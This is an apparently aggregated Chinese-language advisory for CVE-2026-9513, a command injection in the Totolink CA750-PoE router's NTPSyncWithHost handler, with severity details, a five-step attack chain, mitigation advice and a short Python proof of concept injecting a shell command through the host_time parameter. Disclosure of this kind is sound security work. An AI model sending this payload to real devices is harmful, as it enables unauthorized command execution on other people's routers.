CVE-2026-9513 CVSS 6.3 中危

CVE-2026-9513: Totolink CA750-PoE操作系统命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9513

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink CA750-PoE

漏洞概述

Totolink CA750-PoE 6.2c.510版本存在操作系统命令注入漏洞。该漏洞源于Setting Handler组件/cgi-bin/cstecgi.cgi文件中的NTPSyncWithHost函数未正确过滤用户输入。攻击者可通过操纵host_time参数注入恶意命令，导致远程执行任意系统命令，可能泄露敏感信息或破坏系统完整性。

技术细节

该漏洞位于Totolink CA750-PoE路由器的Web管理接口中，具体影响/cgi-bin/cstecgi.cgi文件的NTPSyncWithHost功能。在处理NTP同步请求时，程序直接获取用户提交的host_time参数，并将其拼接到系统命令中执行，未对输入进行严格的过滤或转义。攻击者利用这一缺陷，可以在host_time参数中注入Shell元字符（如分号、管道符等）。当服务器端接收到恶意请求并执行系统调用时，注入的命令将被操作系统解析并执行。由于漏洞利用复杂度低（AC:L）且无需用户交互（UI:N），攻击者只需具备低权限账户即可通过网络发起攻击，进而获取服务器控制权。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标设备为Totolink CA750-PoE，并确认其运行在存在漏洞的6.2c.510版本。

STEP 2

2. 获取凭证

由于CVSS向量显示PR:L（低权限），攻击者需要一个低权限账户登录Web管理界面。

STEP 3

3. 构造Payload

攻击者构造包含Shell元字符的恶意数据包，针对NTPSyncWithHost接口的host_time参数。

STEP 4

4. 发送请求

向/cgi-bin/cstecgi.cgi发送POST请求，注入恶意命令。

STEP 5

5. 命令执行

服务器端未过滤输入，直接拼接执行系统命令，攻击者获得目标系统的部分控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/cgi-bin/cstecgi.cgi"

# Construct the payload to inject OS command
# Example: Reverse shell or simple command execution
# Using ';' to separate commands
injection_payload = "; echo 'CVE-2026-9513_test' > /tmp/poc.txt"

# Data required for the vulnerable function
post_data = {
    "action": "NTPSyncWithHost",
    "host_time": injection_payload
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=post_data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施

建议立即联系厂商获取并安装安全补丁。在未升级前，应将设备管理界面置于内网环境，禁止通过互联网直接访问，并关闭不必要的NTP同步功能或严格限制访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9513
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9513
3 Details https://www.cvedetails.com/cve/CVE-2026-9513/
4 VulDB https://vuldb.com/cve/CVE-2026-9513
5 Link https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_51/51.md
6 Link https://vuldb.com/submit/813924
7 Link https://vuldb.com/vuln/365513
8 Link https://vuldb.com/vuln/365513/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表